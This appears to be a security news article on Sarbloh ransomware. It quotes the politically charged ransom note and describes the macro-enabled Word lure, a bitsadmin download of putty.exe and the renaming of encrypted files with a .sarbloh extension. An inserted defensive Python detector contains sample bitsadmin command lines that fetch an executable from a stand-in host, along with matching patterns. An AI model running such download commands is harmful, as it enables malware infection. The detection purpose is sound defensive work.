Newly Updated Ransomware Supports Indian Farmers’ Protest!

A newly updated ransomware named Sarbloh encrypts user files and then displays a message on the user's screen in support of the Indian farmers' protest.

The Indian government issued a new set of rules and regulations named the ‘Indian Agriculture Act of 2020’, also called the Farm Bills. According to the government, these bills are required to modernize the agricultural industry.

The farmers, however, believe that these new laws will make their job more challenging and hurt their livelihoods while generating revenue. The new law removed the restrictions on how farmers sell their goods and how much they get for them.

However, as this law was passed in parliament, thousands of farmers have been protesting against it in New Delhi.

Read the next section to see why this new ransomware supports the Indian farmers.

Why Does Sarbloh Support Indian Farmers?

According to detailed investigations by multiple security firms, including Malwarebytes, Cyble, and QuickHeal, this ransomware is named Sarbloh and is spreading through Word documents that contain a message in support of Indian farmers.

It is still not clear how the malicious Word documents are spreading. However, when the user clicks on one, a box is shown that prompts the user to Enable Content in order to view the data correctly.

When the user hits the button, the malware starts downloading a file identified as putty.exe, and it also uses bitsadmin.exe. The file is downloaded to the Documents folder and then executed automatically. Once the file has executed, it starts encrypting data and renames the encrypted files with the .sarbloh extension.

Once the ransomware has completed the encryption, it creates a README_SARBLOH.txt file that holds a message in support of the farmers of India.

The message reads:

YOUR FILES ARE GONE!!!

THEY WILL NOT BE RECOVERABLE UNTIL THE DEMANDS OF THE FARMERS HAVE BEEN MET

WHAT HAPPENED TO THEM?

Using military-grade EnCryPtiOn all the files on your system have been made useless.

India, Sikhs have long been the face against the oppression placed upon them.

Each time we have resisted.

Today you come for the very throats of Hindu, Sikh, and Muslim farmers by trying to take their livelihood.

You will not succeed in your sinister ways.

The two-sided sword of the Khalsa is at any moment’s notice. Tyaar bar tyaar.

Wherever our blood is spilled, the tree of Sikhi uproots from there.

If your intentions for the farmers are pure and

you wish to help them, this is not the way.

Halemi Raj, Sikh Raj, was not this way.

If the laws are not repealed. Your fate is no

different to what the Khalsa did to Sirhind.

Waheguru Ji Ka Khalsa, Waheguru Ji Ki Fateh

Khalsa Cyber Fauj
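
For defenders, the infection chain described above (bitsadmin.exe, putty.exe in the Documents folder, .sarbloh files, README_SARBLOH.txt) can be turned into an endpoint triage check. The following Python is an added example, not code from this article or from the firms it cites. The event field names (host, type, image, cmdline, path) are an assumed Sysmon-like layout, the check assumes bitsadmin.exe is what performs the download, and every sample event is constructed.

```python
import re
from collections import defaultdict

# An .exe sitting directly in a Documents folder (download location named in the article).
DOCS_EXE = re.compile(r'\\documents\\[^\\"]+\.exe\b', re.I)

def classify(event):
    """Map one event to a stage of the chain the article describes, or None."""
    if event["type"] == "process":
        if (event["image"].lower().endswith("\\bitsadmin.exe")
                and DOCS_EXE.search(event["cmdline"])):
            return "bits_download"        # bitsadmin.exe saving an .exe to Documents
        if DOCS_EXE.search(event["image"]):
            return "exec_from_documents"  # the downloaded file being executed
    elif event["type"] == "file":
        name = event["path"].lower().rsplit("\\", 1)[-1]
        if name == "readme_sarbloh.txt":
            return "ransom_note"
        if name.endswith(".sarbloh"):
            return "renamed_file"
    return None

def triage(events):
    """Collect matched stages per host and say whether encryption has begun."""
    seen = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            seen[ev["host"]].add(stage)
    return {
        host: {"stages": sorted(stages),
               "verdict": "encrypting" if stages & {"ransom_note", "renamed_file"}
                          else "pre-encryption"}
        for host, stages in seen.items()
    }

# Constructed sample events: hosts, users, URL and paths are invented for the demo.
SAMPLE = [
    {"host": "WS-01", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j http://example.invalid/putty.exe C:\Users\a\Documents\putty.exe"},
    {"host": "WS-01", "type": "process", "image": r"C:\Users\a\Documents\putty.exe", "cmdline": "putty.exe"},
    {"host": "WS-01", "type": "file", "path": r"C:\Users\a\Desktop\budget.xlsx.sarbloh"},
    {"host": "WS-01", "type": "file", "path": r"C:\Users\a\Desktop\README_SARBLOH.txt"},
    {"host": "WS-02", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline": "bitsadmin /list"},
    {"host": "WS-02", "type": "process", "image": r"C:\Program Files\PuTTY\putty.exe", "cmdline": "putty.exe"},
    {"host": "WS-03", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j http://example.invalid/putty.exe C:\Users\b\Documents\putty.exe"},
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE).items():
        print(host, result)
```

A host reported as "pre-encryption" has shown only the download or execution stage, which is the point where isolating it still prevents file loss.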

Summing Up

According to the experts, this campaign was named after the ‘Sarbloh Granth’, a book of scriptures of Sikhism. Sarbloh is open-source ransomware that is also named Khalsa Crypt and has no known weaknesses yet. However, multiple experts think that this new malware doesn’t remove shadow volumes, so it will be easier to remove it from the victim’s system.
